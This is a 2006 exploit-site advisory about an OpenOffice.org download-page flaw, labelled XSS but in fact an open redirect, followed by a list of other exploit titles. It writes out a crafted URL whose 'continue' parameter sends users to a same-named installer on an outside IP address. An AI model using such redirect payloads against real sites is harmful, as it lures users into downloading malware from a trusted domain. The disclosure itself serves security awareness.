exploits , vulnerabilities , articles , OpenOffice.org XSS

2006-06-14

OpenOffice.org XSS

Author:    XiON
Date:      JUN1406
Type:      XSS
Product:   http://www.openoffice.org/
Patch:     N/A


Straight URL (From INDIANA U Mirror):
http://download.openoffice.org/2.0.2/contribute.html?continue=ftp%3A//ftp.ussg.iu.edu/pub/openoffice/stable/2.0.2/OOo_2.0.2_Win32Intel_install_wJRE.exe

Redirected URL:
http://download.openoffice.org/2.0.2/contribute.html?continue=http://216.66.19.100/~clockwo/OpenOffice/OOo_2.0.2_Win32Intel_install_wJRE.exe

Note: the file names are the same, 
so an unsuspecting user will hot continue on the download page,
and inadvertently download an unwanted and potentially dangerous file from
what appears to be a reliable website.

securitydot.net - 2006-06-14

Exploits - newest 10 RSS | More

2007-06-15 55518 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32863 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40907 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28522 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19080 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16132 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18748 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16028 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32691 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16651 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit